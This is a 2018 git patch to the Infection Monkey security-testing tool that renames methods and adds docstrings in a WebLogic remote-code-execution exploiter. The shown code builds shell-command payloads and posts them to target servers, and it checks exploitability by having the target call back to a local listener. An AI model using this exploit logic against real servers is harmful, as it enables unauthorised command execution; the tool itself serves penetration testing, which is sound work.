From 57e795573e1e5bbdd4524b02f705931d29d86296 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Tue, 28 Aug 2018 22:37:07 +0300 Subject: [PATCH] Documented what's required and other minor changes --- infection_monkey/exploit/weblogic.py | 30 ++++++++++++++++++++-------- 1 file changed, 22 insertions(+), 8 deletions(-) diff --git a/infection_monkey/exploit/weblogic.py b/infection_monkey/exploit/weblogic.py index 4169bb537..68ea9f5f2 100644 --- a/infection_monkey/exploit/weblogic.py +++ b/infection_monkey/exploit/weblogic.py @@ -56,9 +56,9 @@ class WebLogicExploiter(WebRCE): def exploit(self, url, command): if 'linux' in self.host.os['type']: - payload = self.exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null') + payload = self.get_exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null') else: - payload = self.exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL') + payload = self.get_exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL') try: post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False) except Exception as e: @@ -99,12 +99,11 @@ class WebLogicExploiter(WebRCE): def stop(self): self._stopped = True - return def check_if_exploitable(self, url): # Server might get response faster than it starts listening to it, we need a lock httpd, lock = self._start_http_server() - payload = self.test_payload(ip=httpd._local_ip, port=httpd._local_port) + payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port) try: post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False) except exceptions.ReadTimeout: @@ -116,6 +115,10 @@ class WebLogicExploiter(WebRCE): return httpd.get_requests > 0 def _start_http_server(self): + """ + Starts custom http server that waits for GET requests + :return: httpd (IndicationHTTPServer daemon object handler), lock (acquired lock) + """ lock = threading.Lock() local_port = get_free_tcp_port() local_ip = get_interface_to_target(self.host.ip_addr) @@ -129,11 +132,16 @@ class WebLogicExploiter(WebRCE): lock.release() httpd.join(SERVER_TIMEOUT) httpd.stop() - return True - @staticmethod - def exploit_payload(cmd_base, cmd_opt, command): + def get_exploit_payload(cmd_base, cmd_opt, command): + """ + Formats the payload used in exploiting weblogic servers + :param cmd_base: What command prompt to use eg. cmd + :param cmd_opt: cmd_base commands parameters. eg. /c (to run command) + :param command: command itself + :return: Formatted payload + """ empty_payload = ''' @@ -162,7 +170,13 @@ class WebLogicExploiter(WebRCE): return payload @staticmethod - def test_payload(ip, port): + def get_test_payload(ip, port): + """ + Gets payload used for testing whether weblogic server is vulnerable + :param ip: Server's IP + :param port: Server's port + :return: Formatted payload + """ generic_check_payload = '''